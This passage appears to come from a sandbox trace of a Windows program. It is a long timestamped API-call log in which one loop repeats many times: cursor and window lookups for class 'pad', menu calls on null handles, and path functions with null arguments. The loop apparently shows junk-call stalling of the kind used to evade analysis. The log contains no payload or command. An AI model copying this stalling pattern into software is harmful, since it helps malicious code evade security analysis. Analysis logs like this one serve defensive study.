lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.412] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.412] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.412] GetMenu (hWnd=0x0) returned 0x0 [0027.412] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x116) returned -1 [0027.412] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.412] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.412] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.412] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.412] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.412] GetStockObject (i=6) returned 0x1b00018 [0027.412] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.412] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.412] PathFileExistsW (pszPath=0x0) returned 0 [0027.412] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.412] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.412] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.413] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.413] GetMenu (hWnd=0x0) returned 0x0 [0027.413] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.413] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.413] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.413] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.413] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.413] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.413] GetStockObject (i=6) returned 0x1b00018 [0027.413] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.413] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.413] PathFileExistsW (pszPath=0x0) returned 0 [0027.413] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.413] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.413] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.413] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.413] GetMenu (hWnd=0x0) returned 0x0 [0027.413] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.413] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.413] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.413] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.413] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.413] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.413] GetStockObject (i=6) returned 0x1b00018 [0027.413] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.413] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.413] PathFileExistsW (pszPath=0x0) returned 0 [0027.413] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.413] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.414] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.414] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.414] GetMenu (hWnd=0x0) returned 0x0 [0027.414] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.414] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.414] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.414] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.414] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.414] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.414] GetStockObject (i=6) returned 0x1b00018 [0027.414] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.414] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.414] PathFileExistsW (pszPath=0x0) returned 0 [0027.414] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.414] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.414] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.414] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.414] GetMenu (hWnd=0x0) returned 0x0 [0027.414] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.414] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.414] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.414] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.414] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.414] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.414] GetStockObject (i=6) returned 0x1b00018 [0027.414] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.414] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.414] PathFileExistsW (pszPath=0x0) returned 0 [0027.415] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.415] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.415] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.415] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.415] GetMenu (hWnd=0x0) returned 0x0 [0027.415] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1d3) returned -1 [0027.415] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.415] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.415] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.415] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.415] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.415] GetStockObject (i=6) returned 0x1b00018 [0027.415] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.415] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.415] PathFileExistsW (pszPath=0x0) returned 0 [0027.415] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.415] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.415] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.415] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.415] GetMenu (hWnd=0x0) returned 0x0 [0027.415] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.415] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.415] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.415] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.415] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.415] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.415] GetStockObject (i=6) returned 0x1b00018 [0027.415] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.416] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.416] PathFileExistsW (pszPath=0x0) returned 0 [0027.416] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.416] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.416] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.416] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.416] GetMenu (hWnd=0x0) returned 0x0 [0027.416] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.416] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.416] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.416] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.416] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.416] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.416] GetStockObject (i=6) returned 0x1b00018 [0027.416] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.416] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.416] PathFileExistsW (pszPath=0x0) returned 0 [0027.416] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.416] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.416] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.416] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.416] GetMenu (hWnd=0x0) returned 0x0 [0027.416] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.416] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.416] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.416] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.416] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.416] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.416] GetStockObject (i=6) returned 0x1b00018 [0027.417] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.417] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.417] PathFileExistsW (pszPath=0x0) returned 0 [0027.417] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.417] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.417] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.417] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.417] GetMenu (hWnd=0x0) returned 0x0 [0027.417] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.417] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.417] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.417] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.417] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.417] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.417] GetStockObject (i=6) returned 0x1b00018 [0027.417] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.417] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.417] PathFileExistsW (pszPath=0x0) returned 0 [0027.417] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.417] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.417] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.417] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.417] GetMenu (hWnd=0x0) returned 0x0 [0027.417] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x174) returned -1 [0027.417] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.417] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.417] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.417] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.418] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.418] GetStockObject (i=6) returned 0x1b00018 [0027.418] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.418] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.418] PathFileExistsW (pszPath=0x0) returned 0 [0027.418] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.418] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.418] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.418] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.418] GetMenu (hWnd=0x0) returned 0x0 [0027.418] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.418] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.418] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.418] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.418] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.418] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.418] GetStockObject (i=6) returned 0x1b00018 [0027.418] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.418] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.418] PathFileExistsW (pszPath=0x0) returned 0 [0027.418] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.418] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.419] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.419] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.419] GetMenu (hWnd=0x0) returned 0x0 [0027.419] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.419] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.419] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.419] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.419] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.419] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.419] GetStockObject (i=6) returned 0x1b00018 [0027.419] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.419] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.419] PathFileExistsW (pszPath=0x0) returned 0 [0027.419] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.419] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.419] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.419] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.419] GetMenu (hWnd=0x0) returned 0x0 [0027.419] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.419] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.419] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.419] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.419] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.419] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.419] GetStockObject (i=6) returned 0x1b00018 [0027.419] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.419] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.419] PathFileExistsW (pszPath=0x0) returned 0 [0027.420] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.420] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.420] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.420] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.420] GetMenu (hWnd=0x0) returned 0x0 [0027.420] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.420] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.420] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.420] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.420] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.420] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.420] GetStockObject (i=6) returned 0x1b00018 [0027.420] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.420] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.420] PathFileExistsW (pszPath=0x0) returned 0 [0027.420] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.420] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.420] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.420] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.420] GetMenu (hWnd=0x0) returned 0x0 [0027.420] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x39c) returned -1 [0027.420] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.420] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.420] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.420] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.421] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.421] GetStockObject (i=6) returned 0x1b00018 [0027.421] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.421] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.421] PathFileExistsW (pszPath=0x0) returned 0 [0027.421] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.421] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.421] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.421] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.421] GetMenu (hWnd=0x0) returned 0x0 [0027.421] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.421] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.421] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.421] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.421] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.421] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.421] GetStockObject (i=6) returned 0x1b00018 [0027.421] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.421] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.421] PathFileExistsW (pszPath=0x0) returned 0 [0027.421] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.421] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.421] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.421] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.421] GetMenu (hWnd=0x0) returned 0x0 [0027.421] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.421] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.421] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.421] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.421] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.421] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.422] GetStockObject (i=6) returned 0x1b00018 [0027.422] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.422] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.422] PathFileExistsW (pszPath=0x0) returned 0 [0027.422] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.422] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.422] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.422] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.422] GetMenu (hWnd=0x0) returned 0x0 [0027.422] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.422] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.422] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.422] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.422] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.422] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.422] GetStockObject (i=6) returned 0x1b00018 [0027.422] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.422] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.422] PathFileExistsW (pszPath=0x0) returned 0 [0027.422] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.422] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.422] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.422] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.422] GetMenu (hWnd=0x0) returned 0x0 [0027.422] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.422] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.422] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.422] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.422] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.422] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.422] GetStockObject (i=6) returned 0x1b00018 [0027.422] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.422] PathAppendA (in: 